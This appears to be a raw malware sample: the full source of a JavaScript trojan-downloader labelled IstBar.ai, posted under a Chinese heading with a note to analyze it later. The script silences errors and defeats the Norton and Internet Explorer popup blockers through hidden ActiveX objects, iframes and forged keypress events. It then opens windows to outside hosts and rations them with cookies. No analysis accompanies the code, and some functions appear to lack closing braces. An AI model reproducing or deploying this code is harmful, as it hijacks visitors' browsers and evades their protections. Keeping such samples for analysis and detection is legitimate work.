Trojan program TrojanDownloader.JS.IstBar.ai 病毒样本

//detected: Trojan program Trojan-Downloader.JS.IstBar.ai URL: http://www.ffkan.com/js/newsp2.js

var paypopupURL = "http://www.m117.cn/?f";

var usingActiveX = true;

function blockError(){return true;}

window.onerror = blockError;

//bypass norton internet security popup blocker

if (window.SymRealWinOpen){window.open = SymRealWinOpen;}

if (window.NS_ActualOpen) {window.open = NS_ActualOpen;}

if (typeof(usingClick) == 'undefined') {var usingClick = false;}

if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;}

if (typeof(popwin) == 'undefined') {var popwin = null;}

if (typeof(poped) == 'undefined') {var poped = false;}

var blk = 1;

var setupClickSuccess = false;

var googleInUse = false;

var myurl = location.href+'/';

var MAX_TRIED = 20;

var activeXTried = false;

var tried = 0;

var randkey = '0'; // random key from server

var myWindow;

var popWindow;

var setupActiveXSuccess = 0;

// bypass IE functions

function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('<DIV STYLE="display:none;"><INPUT ID="autoHit" TYPE="TEXT" ONKEYPRESS="showActiveX()"></DIV>');

popWindow=window.createPopup();

popWindow.document.body.innerHTML='<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="http://www.resume-cn.com/firefox.htm" TYPE="text/html"></OBJECT></DIV>'; // error page

document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;1px;height:1px;" src="/about:blank"></IFRAME>');

popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="http://www.resume-cn.com/firefox.htm" TYPE="text/html"></OBJECT>'); // error page

setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}

function tryActiveX(){

if (!activeXTried && !poped)

{

if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow)

{

myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;

}

else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow)

{

myWindow=popIframe.getParentFrame.object.parentWindow;

popIframe.location.replace('about:blank');

}

else

{setTimeout('tryActiveX()',200);

tried++;

if (tried >= MAX_TRIED && !activeXTried)

{

activeXTried = true;

setupClick();}return;

}

openActiveX();

window.windowFired=true;self.focus();

}

function openActiveX()

{

if (!activeXTried && !poped)

{

if (myWindow && window.windowFired)

{

window.windowFired=false;

document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));

}

else

{

setTimeout('openActiveX();',100);

}

tried++;

if (tried >= MAX_TRIED)

{activeXTried = true;setupClick();

}

function showActiveX()

{

if (!activeXTried && !poped)

{

if (googleInUse) {

window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);

window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);

}

newWindow=myWindow.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");

if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}

// end bypass IE functions

// normal call functions

function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {

popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");

if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}

// end normal call functions

// onclick call functions

function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}

function gopop() {

if (!poped)

{popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");

if (popwin) {poped = true;}self.focus();}

if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}

// end onclick call functions

// check version

function version() {

var os = 'W0';

var bs = 'I0';

var isframe = false;

var browser = window.navigator.userAgent;

if (browser.indexOf('Win') != -1) {os = 'W1';}

if (browser.indexOf("SV1") != -1) {bs = 'I2';}

else if (browser.indexOf("Opera") != -1) {bs = "I0";}

else if (browser.indexOf("Firefox") != -1) {bs = "I0";}

else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}

if (top.location != this.location) {isframe = true;}

paypopupURL = paypopupURL;

usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();

}

version();

// end check version

function loadingPop() {

if(!usingClick && !usingActiveX) {

paypopup();

}

else if (usingActiveX) {tryActiveX();}

else {setupClick();}

}

//\\\\\\\\\\\\\\

function GetCookie (name) {

var arg = name + "=";

var alen = arg.length;

var clen = document.cookie.length;

var i = 0;

while (i < clen) {

var j = i + alen;

if (document.cookie.substring(i, j) == arg)

return getCookieVal (j);

i = document.cookie.indexOf(" ", i) + 1;

if (i == 0) break;

}

return null;

}

function SetCookie (name, value) {

var argv = SetCookie.arguments;

var argc = SetCookie.arguments.length;

var expires = (argc > 2) ? argv[2] : null;

var path = (argc > 3) ? argv[3] : null;

var domain = (argc > 4) ? argv[4] : null;

var secure = (argc > 5) ? argv[5] : false;

document.cookie = name + "=" + escape (value) +

((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +

((path == null) ? "" : ("; path=" + path)) +

((domain == null) ? "" : ("; domain=" + domain)) +

((secure == true) ? "; secure" : "");

}

function DeleteCookie (name) {

var exp = new Date();

exp.setTime (exp.getTime() - 1);

// This cookie is history

var cval = 0;

document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();

}

//设置cookies时间,自己根据情况设置。

var expDays = 1;

var exp = new Date();

exp.setTime(exp.getTime() + (expDays*6*60*60*1000));

function amt(){

var count = GetCookie('countsports'); //同一ip只显示一次

//var count;//同一ip只显示N次

//alert(count);

//count = null;

if(count == null) {

SetCookie('countsports','1')

return 1

}

else{

var newcount = parseInt(count) + 1;

if(newcount<2) count=1;

SetCookie('countsports',newcount,exp);

//DeleteCookie('countsports')

return newcount

}

function getCookieVal(offset) {

var endstr = document.cookie.indexOf (";", offset);

if (endstr == -1)

endstr = document.cookie.length;

return unescape(document.cookie.substring(offset, endstr));

}

function btpop(){

if(amt()==1)

{

openWindowBack();

try{

aryADSeq.push("openWindowBack()");

}catch(e){

openWindowBack();

}

function openWindowBack() {

myurl = myurl.substring(0, myurl.indexOf('/',8));

if (myurl == '') {myurl = '.';}

setupActiveX();

loadingPop();

//self.focus();

}

btpop()

有时间分析一下